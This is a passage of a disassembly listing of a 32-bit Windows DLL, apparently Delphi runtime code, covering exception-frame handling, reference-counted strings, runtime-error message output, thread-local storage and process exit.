mov al, 0D9h
jmp short loc_10002BBF
; ---------------------------------------------------------------------------
loc_10002BB9: ; CODE XREF: CODE:10002B88�j
mov al, 0CAh
jmp short loc_10002BBF
; ---------------------------------------------------------------------------
loc_10002BBD: ; CODE XREF: CODE:10002B5B�j
; CODE:10002B69�j ...
mov al, 0FFh
loc_10002BBF: ; CODE XREF: CODE:10002B93�j
; CODE:10002B97�j ...
and eax, 0FFh
mov edx, [edx+0Ch]
call sub_100024B4
; ---------------------------------------------------------------------------
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_10002BD0: ; DATA XREF: sub_10002C70+D�o
mov eax, [esp+4]
test dword ptr [eax+4], 6
jnz loc_10002C6A
cmp ds:byte_10004010, 0
ja short loc_10002BF9
lea eax, [esp+4]
push eax
call sub_10001018 ; UnhandledExceptionFilter
cmp eax, 0
jz short loc_10002C6A
loc_10002BF9: ; CODE XREF: CODE:10002BE8�j
mov eax, [esp+4]
cld
call sub_10002828
mov edx, [esp+8]
push 0
push eax
push offset loc_10002C16
push edx
call ds:off_10005014
loc_10002C16: ; DATA XREF: CODE:10002C0A�o
mov ebx, [esp+4]
cmp dword ptr [ebx], 0EEDFADEh
mov edx, [ebx+14h]
mov eax, [ebx+18h]
jz short loc_10002C45
mov edx, ds:dword_1000500C
test edx, edx
jz loc_10002B30
mov eax, ebx
call edx
test eax, eax
jz loc_10002B30
mov edx, [ebx+0Ch]
loc_10002C45: ; CODE XREF: CODE:10002C26�j
call sub_10002910
mov ecx, ds:dword_10005004
test ecx, ecx
jz short loc_10002C56
call ecx
loc_10002C56: ; CODE XREF: CODE:10002C52�j
mov ecx, [esp+4]
mov eax, 0D9h
mov edx, [ecx+14h]
mov [esp], edx
jmp sub_10002FB4
; ---------------------------------------------------------------------------
loc_10002C6A: ; CODE XREF: CODE:10002BDB�j
; CODE:10002BF7�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10002C70 proc near ; CODE XREF: sub_10002D78+2E�p
xor edx, edx
lea eax, [ebp-0Ch]
mov ecx, fs:[edx]
mov fs:[edx], eax
mov [eax], ecx
mov dword ptr [eax+4], offset loc_10002BD0
mov [eax+8], ebp
mov ds:dword_10005620, eax
retn
sub_10002C70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10002C90 proc near ; CODE XREF: sub_10002ED0:loc_10002F5A�p
xor edx, edx
mov eax, ds:dword_10005620
test eax, eax
jz short locret_10002CB7
mov ecx, fs:[edx]
cmp eax, ecx
jnz short loc_10002CAA
mov eax, [eax]
mov fs:[edx], eax
retn
; ---------------------------------------------------------------------------
loc_10002CA8: ; CODE XREF: sub_10002C90+21�j
mov ecx, [ecx]
loc_10002CAA: ; CODE XREF: sub_10002C90+10�j
cmp ecx, 0FFFFFFFFh
jz short locret_10002CB7
cmp [ecx], eax
jnz short loc_10002CA8
mov eax, [eax]
mov [ecx], eax
locret_10002CB7: ; CODE XREF: sub_10002C90+9�j
; sub_10002C90+1D�j
retn
sub_10002C90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10002CB8 proc near ; CODE XREF: sub_10002CB8+4B�p
; sub_10002D18+4B�p ...
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 10002930 SIZE 00000104 BYTES
; FUNCTION CHUNK AT 10002A54 SIZE 00000006 BYTES
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, offset dword_1000561C
mov eax, [edi+8]
test eax, eax
jz short loc_10002D12
mov ebx, [edi+0Ch]
mov esi, [eax+4]
xor edx, edx
push ebp
push offset loc_10002CFE
push dword ptr fs:[edx]
mov fs:[edx], esp
test ebx, ebx
jle short loc_10002CF4
loc_10002CE2: ; CODE XREF: sub_10002CB8+3A�j
dec ebx
mov [edi+0Ch], ebx
mov eax, [esi+ebx*8+4]
test eax, eax
jz short loc_10002CF0
call eax
loc_10002CF0: ; CODE XREF: sub_10002CB8+34�j
test ebx, ebx
jg short loc_10002CE2
loc_10002CF4: ; CODE XREF: sub_10002CB8+28�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_10002D12
; ---------------------------------------------------------------------------
loc_10002CFE: ; DATA XREF: sub_10002CB8+1B�o
jmp loc_10002930
; ---------------------------------------------------------------------------
call sub_10002CB8
call sub_10002A94
call sub_10002AE8
loc_10002D12: ; CODE XREF: sub_10002CB8+10�j
; sub_10002CB8+44�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_10002CB8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10002D18 proc near ; CODE XREF: sub_10002D78+3A�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov eax, ds:off_10005624
test eax, eax
jz short loc_10002D72
mov esi, [eax]
xor ebx, ebx
mov edi, [eax+4]
xor edx, edx
push ebp
push offset loc_10002D5E
push dword ptr fs:[edx]
mov fs:[edx], esp
cmp esi, ebx
jle short loc_10002D54
loc_10002D40: ; CODE XREF: sub_10002D18+3A�j
mov eax, [edi+ebx*8]
inc ebx
mov ds:dword_10005628, ebx
test eax, eax
jz short loc_10002D50
call eax
loc_10002D50: ; CODE XREF: sub_10002D18+34�j
cmp esi, ebx
jg short loc_10002D40
loc_10002D54: ; CODE XREF: sub_10002D18+26�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_10002D72
; ---------------------------------------------------------------------------
loc_10002D5E: ; DATA XREF: sub_10002D18+19�o
jmp loc_10002930
; ---------------------------------------------------------------------------
call sub_10002CB8
call sub_10002A94
call sub_10002AE8
loc_10002D72: ; CODE XREF: sub_10002D18+D�j
; sub_10002D18+44�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_10002D18 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10002D78 proc near ; CODE XREF: sub_10003450+3A�p
mov ds:off_10005010, offset sub_10001008
mov ds:off_10005014, offset sub_10001010
mov ds:off_10005624, eax
xor eax, eax
mov ds:dword_10005628, eax
mov ds:off_1000562C, edx
mov eax, [edx+4]
mov ds:dword_1000501C, eax
call sub_10002C70
mov ds:byte_10005024, 0
call sub_10002D18
retn
sub_10002D78 endp
; =============== S U B R O U T I N E =======================================
sub_10002DB8 proc near ; CODE XREF: sub_10002ED0+38�p
push ebx
push esi
push edi
mov esi, offset aRuntimeErrorAt ; "Runtime error at 00000000"
mov cl, 10h
mov ebx, ds:dword_10004000
loc_10002DC8: ; CODE XREF: sub_10002DB8+33�j
mov eax, ebx
mov edi, 0Ah
cdq
idiv edi
add dl, 30h
xor eax, eax
mov al, cl
mov [esi+eax], dl
mov eax, ebx
mov ebx, 0Ah
cdq
idiv ebx
mov ebx, eax
dec ecx
test ebx, ebx
jnz short loc_10002DC8
mov cl, 1Ch
mov eax, ds:dword_10004004
loc_10002DF4: ; CODE XREF: sub_10002DB8+54�j
mov edx, eax
and edx, 0Fh
mov dl, ds:byte_10004074[edx]
xor ebx, ebx
mov bl, cl
mov [esi+ebx], dl
shr eax, 4
dec ecx
test eax, eax
jnz short loc_10002DF4
pop edi
pop esi
pop ebx
retn
sub_10002DB8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10002E14 proc near ; CODE XREF: sub_10002ED0+9E�p
xor eax, eax
xchg eax, ds:dword_10004000
neg eax
sbb eax, eax
inc eax
mov edi, offset dword_1000561C
mov ebx, [edi+18h]
mov ebp, [edi+14h]
push dword ptr [edi+1Ch]
push dword ptr [edi+20h]
mov esi, [edi]
mov ecx, 0Bh
rep movsd
pop edi
pop esi
leave
retn 0Ch
sub_10002E14 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10002E44 proc near ; CODE XREF: sub_10002ED0+3D�p
var_4 = byte ptr -4
push ecx
cmp ds:byte_10005034, 0
jz short loc_10002EA5
cmp ds:word_10005208, 0D7B2h
jnz short loc_10002E6D
cmp ds:dword_10005210, 0
jbe short loc_10002E6D
mov eax, offset dword_10005204
call ds:dword_10005220
loc_10002E6D: ; CODE XREF: sub_10002E44+13�j
; sub_10002E44+1C�j
push 0
lea eax, [esp+8+var_4]
push eax
push 1Eh
push offset aRuntimeErrorAt ; "Runtime error at 00000000"
push 0FFFFFFF5h
call sub_10001000 ; GetStdHandle
push eax
call sub_10001020 ; WriteFile
push 0
lea eax, [esp+8+var_4]
push eax
push 2
push offset dword_10002ECC
push 0FFFFFFF5h
call sub_10001000 ; GetStdHandle
push eax
call sub_10001020 ; WriteFile
pop edx
retn
; ---------------------------------------------------------------------------
loc_10002EA5: ; CODE XREF: sub_10002E44+8�j
cmp ds:byte_10004018, 0
jnz short loc_10002EC1
push 0
push offset aError ; "Error"
push offset aRuntimeErrorAt ; "Runtime error at 00000000"
push 0
call sub_10001038 ; MessageBoxA
loc_10002EC1: ; CODE XREF: sub_10002E44+68�j
pop edx
retn
sub_10002E44 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 2
dword_10002ECC dd 0A0Dh
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_10002ED0 proc near ; CODE XREF: sub_10002FA8+5�p
; sub_10003A08+D6�p
push ebx
push esi
push edi
push ebp
mov ebx, offset dword_1000561C
mov esi, offset dword_10004000
mov edi, offset dword_10005030
cmp byte ptr [ebx+28h], 0
jnz short loc_10002EFF
cmp dword ptr [edi], 0
jz short loc_10002EFF
loc_10002EEE: ; CODE XREF: sub_10002ED0+2D�j
mov edx, [edi]
mov eax, edx
xor edx, edx
mov [edi], edx
mov ebp, eax
call ebp
cmp dword ptr [edi], 0
jnz short loc_10002EEE
loc_10002EFF: ; CODE XREF: sub_10002ED0+17�j
; sub_10002ED0+1C�j
cmp ds:dword_10004004, 0
jz short loc_10002F19
call sub_10002DB8
call sub_10002E44
xor eax, eax
mov ds:dword_10004004, eax
loc_10002F19: ; CODE XREF: sub_10002ED0+36�j
; sub_10002ED0+CE�j
cmp byte ptr [ebx+28h], 2
jnz short loc_10002F29
cmp dword ptr [esi], 0
jnz short loc_10002F29
xor eax, eax
mov [ebx+0Ch], eax
loc_10002F29: ; CODE XREF: sub_10002ED0+4D�j
; sub_10002ED0+52�j
call sub_10002CB8
cmp byte ptr [ebx+28h], 1
jbe short loc_10002F39
cmp dword ptr [esi], 0
jz short loc_10002F5A
loc_10002F39: ; CODE XREF: sub_10002ED0+62�j
mov eax, [ebx+10h]
test eax, eax
jz short loc_10002F5A
call sub_1000323C
mov edx, [ebx+10h]
mov eax, [edx+10h]
cmp eax, [edx+4]
jz short loc_10002F5A
test eax, eax
jz short loc_10002F5A
push eax
call sub_10001040 ; FreeLibrary
loc_10002F5A: ; CODE XREF: sub_10002ED0+67�j
; sub_10002ED0+6E�j ...
call sub_10002C90
cmp byte ptr [ebx+28h], 1
jnz short loc_10002F68
call dword ptr [ebx+24h]
loc_10002F68: ; CODE XREF: sub_10002ED0+93�j
cmp byte ptr [ebx+28h], 0
jz short loc_10002F73
call sub_10002E14
loc_10002F73: ; CODE XREF: sub_10002ED0+9C�j
cmp dword ptr [ebx], 0
jnz short loc_10002F8F
cmp ds:dword_10005018, 0
jz short loc_10002F87
call ds:dword_10005018
loc_10002F87: ; CODE XREF: sub_10002ED0+AF�j
mov eax, [esi]
push eax
call sub_10001030 ; ExitProcess
loc_10002F8F: ; CODE XREF: sub_10002ED0+A6�j
mov eax, [ebx]
push esi
mov esi, eax
mov edi, ebx
mov ecx, 0Bh
rep movsd
pop esi
jmp loc_10002F19
sub_10002ED0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop ebp
pop edi
pop esi
pop ebx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_10002FA8 proc near ; CODE XREF: sub_100024B4+6�p
; sub_10002FB4+6�j
mov ds:dword_10004000, eax
call sub_10002ED0
sub_10002FA8 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_10002FB4 proc near ; CODE XREF: CODE:10002C65�j
; sub_100033C0+1A�p ...
pop ds:dword_10004004
jmp sub_10002FA8
sub_10002FB4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_10002FC0 proc near ; CODE XREF: sub_10002654+F�p
; sub_10003084+23�p ...
mov edx, [eax]
test edx, edx
jz short locret_10002FE2
mov dword ptr [eax], 0
mov ecx, [edx-8]
dec ecx
jl short locret_10002FE2
lock dec dword ptr [edx-8]
jnz short locret_10002FE2
push eax
lea eax, [edx-8]
call sub_10002444
pop eax
locret_10002FE2: ; CODE XREF: sub_10002FC0+4�j
; sub_10002FC0+10�j ...
retn
sub_10002FC0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10002FE4 proc near ; CODE XREF: sub_100035AC+B1�p
push ebx
push esi
mov ebx, eax
mov esi, edx
loc_10002FEA: ; CODE XREF: sub_10002FE4+2A�j
mov edx, [ebx]
test edx, edx
jz short loc_1000300A
mov dword ptr [ebx], 0
mov ecx, [edx-8]
dec ecx
jl short loc_1000300A
lock dec dword ptr [edx-8]
jnz short loc_1000300A
lea eax, [edx-8]
call sub_10002444
loc_1000300A: ; CODE XREF: sub_10002FE4+A�j
; sub_10002FE4+16�j ...
add ebx, 4
dec esi
jnz short loc_10002FEA
pop esi
pop ebx
retn
sub_10002FE4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10003014 proc near ; CODE XREF: sub_100035AC+97�p
; sub_10003A08+A2�p
test edx, edx
jz short loc_1000303C
mov ecx, [edx-8]
inc ecx
jg short loc_10003038
push eax
push edx
mov eax, [edx-4]
call sub_10003058
mov edx, eax
pop eax
push edx
mov ecx, [eax-4]
call sub_10002528
pop edx
pop eax
jmp short loc_1000303C
; ---------------------------------------------------------------------------
loc_10003038: ; CODE XREF: sub_10003014+8�j
lock inc dword ptr [edx-8]
loc_1000303C: ; CODE XREF: sub_10003014+2�j
; sub_10003014+22�j
xchg edx, [eax]
test edx, edx
jz short locret_10003056
mov ecx, [edx-8]
dec ecx
jl short locret_10003056
lock dec dword ptr [edx-8]
jnz short locret_10003056
lea eax, [edx-8]
call sub_10002444
locret_10003056: ; CODE XREF: sub_10003014+2C�j
; sub_10003014+32�j ...
retn
sub_10003014 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10003058 proc near ; CODE XREF: sub_10003014+F�p
; sub_10003084+B�p ...
test eax, eax
jle short loc_10003080
push eax
add eax, 0Ah
and eax, 0FFFFFFFEh
push eax
call sub_10002424
pop edx
mov word ptr [edx+eax-2], 0
add eax, 8
pop edx
mov [eax-4], edx
mov dword ptr [eax-8], 1
retn
; ---------------------------------------------------------------------------
loc_10003080: ; CODE XREF: sub_10003058+2�j
xor eax, eax
retn
sub_10003058 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10003084 proc near ; CODE XREF: sub_10002654+2F�p
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, ecx
mov eax, edi
call sub_10003058
mov ecx, edi
mov edi, eax
test esi, esi
jz short loc_100030A5
mov edx, eax
mov eax, esi
call sub_10002528
loc_100030A5: ; CODE XREF: sub_10003084+16�j
mov eax, ebx
call sub_10002FC0
mov [ebx], edi
pop edi
pop esi
pop ebx
retn
sub_10003084 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100030B4 proc near ; CODE XREF: sub_100035AC+38�p
; sub_100035AC+7F�p
test eax, eax
jz short locret_100030BB
mov eax, [eax-4]
locret_100030BB: ; CODE XREF: sub_100030B4+2�j
retn
sub_100030B4 endp
; =============== S U B R O U T I N E =======================================
sub_100030BC proc near ; CODE XREF: sub_100035AC+15�p
; sub_100035AC+1D�p
test eax, eax
jz short locret_100030CA
mov edx, [eax-8]
inc edx
jle short locret_100030CA
lock inc dword ptr [eax-8]
locret_100030CA: ; CODE XREF: sub_100030BC+2�j
; sub_100030BC+8�j
retn
sub_100030BC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100030CC proc near ; CODE XREF: sub_10003710+185�p
test eax, eax
jz short loc_100030D2
retn
; ---------------------------------------------------------------------------
byte_100030D1 db 0 ; DATA XREF: sub_100030CC:loc_100030D2�o
; ---------------------------------------------------------------------------
loc_100030D2: ; CODE XREF: sub_100030CC+2�j
mov eax, offset byte_100030D1
retn
sub_100030CC endp
; =============== S U B R O U T I N E =======================================
sub_100030D8 proc near ; CODE XREF: sub_1000311C�j
mov edx, [eax]
test edx, edx
jz short loc_10003116
mov ecx, [edx-8]
dec ecx
jz short loc_10003116
push ebx
mov ebx, eax
mov eax, [edx-4]
call sub_10003058
mov edx, eax
mov eax, [ebx]
mov [ebx], edx
push eax
mov ecx, [eax-4]
call sub_10002528
pop eax
mov ecx, [eax-8]
dec ecx
jl short loc_10003113
lock dec dword ptr [eax-8]
jnz short loc_10003113
lea eax, [eax-8]
call sub_10002444
loc_10003113: ; CODE XREF: sub_100030D8+2B�j
; sub_100030D8+31�j
mov edx, [ebx]
pop ebx
loc_10003116: ; CODE XREF: sub_100030D8+4�j
; sub_100030D8+A�j
mov eax, edx
retn
sub_100030D8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1000311C proc near ; CODE XREF: sub_100035AC+63�p
; sub_10003A08+74�p ...
jmp sub_100030D8
sub_1000311C endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10003124 proc near ; CODE XREF: sub_10002568+7F�p
; sub_10003A08+6A�p
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
xor edi, edi
test edx, edx
jle short loc_10003179
mov eax, [ebx]
test eax, eax
jz short loc_1000315A
cmp dword ptr [eax-8], 1
jnz short loc_1000315A
sub eax, 8
add edx, 9
push eax
mov eax, esp
call sub_10002464
pop eax
add eax, 8
mov [ebx], eax
mov [eax-4], esi
mov byte ptr [esi+eax], 0
jmp short loc_10003182
; ---------------------------------------------------------------------------
loc_1000315A: ; CODE XREF: sub_10003124+11�j
; sub_10003124+17�j
mov eax, edx
call sub_10003058
mov edi, eax
mov eax, [ebx]
test eax, eax
jz short loc_10003179
mov edx, edi
mov ecx, [eax-4]
cmp ecx, esi
jl short loc_10003174
mov ecx, esi
loc_10003174: ; CODE XREF: sub_10003124+4C�j
call sub_10002528
loc_10003179: ; CODE XREF: sub_10003124+B�j
; sub_10003124+43�j
mov eax, ebx
call sub_10002FC0
mov [ebx], edi
loc_10003182: ; CODE XREF: sub_10003124+34�j
pop edi
pop esi
pop ebx
retn
sub_10003124 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_10003188 proc near ; CODE XREF: CODE:1000319F�p
; DATA XREF: sub_100031A8:loc_100031AF�o ...
mov al, 10h
jmp sub_1000250C
sub_10003188 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_10003190: ; DATA XREF: sub_100031A8+14�o
; BSS:off_10005648�o
mov ax, [eax]
sub ax, 2
jb short locret_100031A4
sub ax, 8
jz short locret_100031A4
call sub_10003188
; ---------------------------------------------------------------------------
locret_100031A4: ; CODE XREF: CODE:10003197�j
; CODE:1000319D�j
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100031A8 proc near ; CODE XREF: sub_10003318+4F�p
mov edx, offset off_10005648
xor eax, eax
loc_100031AF: ; CODE XREF: sub_100031A8+12�j
mov dword ptr [edx+eax*4], offset sub_10003188
inc eax
cmp eax, 2Bh
jnz short loc_100031AF
mov eax, offset loc_10003190
mov ds:off_10005648, eax
retn
sub_100031A8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_100031C8 proc near ; DATA XREF: sub_10003318+17�o
; BSS:off_10005000�o
mov al, 11h
jmp sub_1000250C
sub_100031C8 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100031D0 proc near ; CODE XREF: sub_1000323C+1B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov [ebp+var_4], eax
mov eax, ds:dword_10004020
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_10003223
loc_100031EA: ; CODE XREF: sub_100031D0+51�j
xor eax, eax
push ebp
push offset loc_1000320B
push dword ptr fs:[eax]
mov fs:[eax], esp
mov ebx, [ebp+var_8]
mov eax, [ebp+var_4]
call dword ptr [ebx+4]
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_10003215
; ---------------------------------------------------------------------------
loc_1000320B: ; DATA XREF: sub_100031D0+1D�o
jmp loc_10002930
; ---------------------------------------------------------------------------
call sub_10002AE8
loc_10003215: ; CODE XREF: sub_100031D0+39�j
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_100031EA
loc_10003223: ; CODE XREF: sub_100031D0+18�j
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_100031D0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_1000322C proc near ; CODE XREF: sub_10003444+5�p
mov edx, ds:dword_1000401C
mov [eax], edx
mov ds:dword_1000401C, eax
retn
sub_1000322C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000323C proc near ; CODE XREF: sub_10002ED0+70�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], eax
xor edx, edx
push ebp
push offset loc_100032A0
push dword ptr fs:[edx]
mov fs:[edx], esp
mov eax, [ebp+var_4]
mov eax, [eax+4]
call sub_100031D0
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_100032A7
loc_10003269: ; CODE XREF: sub_1000323C+69�j
mov eax, [ebp+var_4]
cmp eax, ds:dword_1000401C
jnz short loc_10003280
mov eax, [ebp+var_4]
mov eax, [eax]
mov ds:dword_1000401C, eax
jmp short loc_1000329F
; ---------------------------------------------------------------------------
loc_10003280: ; CODE XREF: sub_1000323C+36�j
mov eax, ds:dword_1000401C
test eax, eax
jz short loc_1000329F
loc_10003289: ; CODE XREF: sub_1000323C+61�j
mov edx, [eax]
cmp edx, [ebp+var_4]
jnz short loc_10003299
mov edx, [ebp+var_4]
mov edx, [edx]
mov [eax], edx
jmp short loc_1000329F
; ---------------------------------------------------------------------------
loc_10003299: ; CODE XREF: sub_1000323C+52�j
mov eax, [eax]
test eax, eax
jnz short loc_10003289
loc_1000329F: ; CODE XREF: sub_1000323C+42�j
; sub_1000323C+4B�j ...
retn
; ---------------------------------------------------------------------------
loc_100032A0: ; DATA XREF: sub_1000323C+A�o
jmp loc_10002A5C
; ---------------------------------------------------------------------------
jmp short loc_10003269
; ---------------------------------------------------------------------------
loc_100032A7: ; CODE XREF: sub_1000323C:loc_1000329F�j
; DATA XREF: sub_1000323C+28�o
pop ecx
pop ebp
retn
sub_1000323C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100032AC proc near ; CODE XREF: sub_10003710+268�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_100032BA
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_100032BA: ; CODE XREF: sub_100032AC+8�j
call ds:off_10004028
pop ebp
retn
sub_100032AC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100032C4 proc near ; DATA XREF: CODE:100039EC�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_1000330E
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_100055A4
jnz short loc_10003300
mov eax, offset dword_10005038
call sub_100026B4
mov eax, offset dword_10005204
call sub_100026B4
mov eax, offset dword_100053D0
call sub_100026B4
call sub_10001834
loc_10003300: ; CODE XREF: sub_100032C4+17�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10003315
loc_1000330D: ; CODE XREF: sub_100032C4+4F�j
retn
; ---------------------------------------------------------------------------
loc_1000330E: ; DATA XREF: sub_100032C4+6�o
jmp loc_10002A5C
; ---------------------------------------------------------------------------
jmp short loc_1000330D
; ---------------------------------------------------------------------------
loc_10003315: ; CODE XREF: sub_100032C4:loc_1000330D�j
; DATA XREF: sub_100032C4+44�o
pop ebp
retn
sub_100032C4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10003318 proc near ; DATA XREF: CODE:100039E8�o
sub ds:dword_100055A4, 1
jnb short locret_1000338A
mov ds:byte_10004008, 2
mov ds:byte_10005036, 2
mov ds:off_10005000, offset sub_100031C8
call sub_10002734
test al, al
jz short loc_10003347
call sub_10002764
loc_10003347: ; CODE XREF: sub_10003318+28�j
call sub_10002828
mov ds:word_1000503C, 0D7B0h
mov ds:word_10005208, 0D7B0h
mov ds:word_100053D4, 0D7B0h
call sub_100031A8
call sub_10001048 ; GetCommandLineA
mov ds:dword_1000502C, eax
call sub_10001080
mov ds:dword_10005028, eax
call sub_10001078 ; GetCurrentThreadId
mov ds:dword_10005020, eax
locret_1000338A: ; CODE XREF: sub_10003318+7�j
retn
sub_10003318 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1000338C proc near ; CODE XREF: sub_10003450+C�p
jmp ds:dword_100060F4
sub_1000338C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_10003394 proc near ; CODE XREF: sub_100033AC+3�p
jmp ds:dword_100060F0
sub_10003394 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1000339C proc near ; CODE XREF: sub_10003404+25�p
; sub_10003404+36�p
jmp ds:dword_100060EC
sub_1000339C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_100033A4 proc near ; CODE XREF: sub_100033C0+3D�p
jmp ds:dword_100060E8
sub_100033A4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100033AC proc near ; CODE XREF: sub_100033C0+21�p
push eax
push 40h
call sub_10003394 ; LocalAlloc
retn
sub_100033AC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100033B8 proc near ; CODE XREF: sub_100033C0+1�p
mov eax, 8
retn
sub_100033B8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_100033C0 proc near ; CODE XREF: sub_10003404:loc_1000341E�p
push ebx
call sub_100033B8
mov ebx, eax
test ebx, ebx
jz short loc_10003402
cmp ds:TlsIndex, 0FFFFFFFFh
jnz short loc_100033DF
mov eax, 0E2h
call sub_10002FB4
; ---------------------------------------------------------------------------
loc_100033DF: ; CODE XREF: sub_100033C0+13�j
mov eax, ebx
call sub_100033AC
test eax, eax
jnz short loc_100033F6
mov eax, 0E2h
call sub_10002FB4
; ---------------------------------------------------------------------------
jmp short loc_10003402
; ---------------------------------------------------------------------------
loc_100033F6: ; CODE XREF: sub_100033C0+28�j
push eax
mov eax, ds:TlsIndex
push eax
call sub_100033A4 ; TlsSetValue
loc_10003402: ; CODE XREF: sub_100033C0+A�j
; sub_100033C0+34�j
pop ebx
retn
sub_100033C0 endp
; =============== S U B R O U T I N E =======================================
sub_10003404 proc near ; CODE XREF: sub_100024C0+20�p
; sub_10002518+3�p ...
mov cl, ds:byte_100056F4
mov eax, ds:TlsIndex
test cl, cl
jnz short loc_10003439
mov edx, large fs:2Ch
mov eax, [edx+eax*4]
retn
; ---------------------------------------------------------------------------
loc_1000341E: ; CODE XREF: sub_10003404+3D�j
call sub_100033C0
mov eax, ds:TlsIndex
push eax
call sub_1000339C ; TlsGetValue
test eax, eax
jz short loc_10003433
retn
; ---------------------------------------------------------------------------
loc_10003433: ; CODE XREF: sub_10003404+2C�j
mov eax, ds:dword_10005708
retn
; ---------------------------------------------------------------------------
loc_10003439: ; CODE XREF: sub_10003404+D�j
push eax
call sub_1000339C ; TlsGetValue
test eax, eax
jz short loc_1000341E
retn
sub_10003404 endp
; =============== S U B R O U T I N E =======================================
sub_10003444 proc near ; CODE XREF: sub_10003450+2E�p
mov eax, (offset a123456789abcde+0Fh)
call sub_1000322C
retn
sub_10003444 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10003450 proc near ; CODE XREF: sub_10003A08+13�p
push ebx
mov ebx, eax
xor eax, eax
mov ds:TlsIndex, eax
push 0
call sub_1000338C ; GetModuleHandleA
mov ds:dword_10005700, eax
mov eax, ds:dword_10005700
mov ds:dword_10004088, eax
xor eax, eax
mov ds:dword_1000408C, eax
xor eax, eax
mov ds:dword_10004090, eax
call sub_10003444
mov edx, (offset a123456789abcde+0Fh)
mov eax, ebx
call sub_10002D78
pop ebx
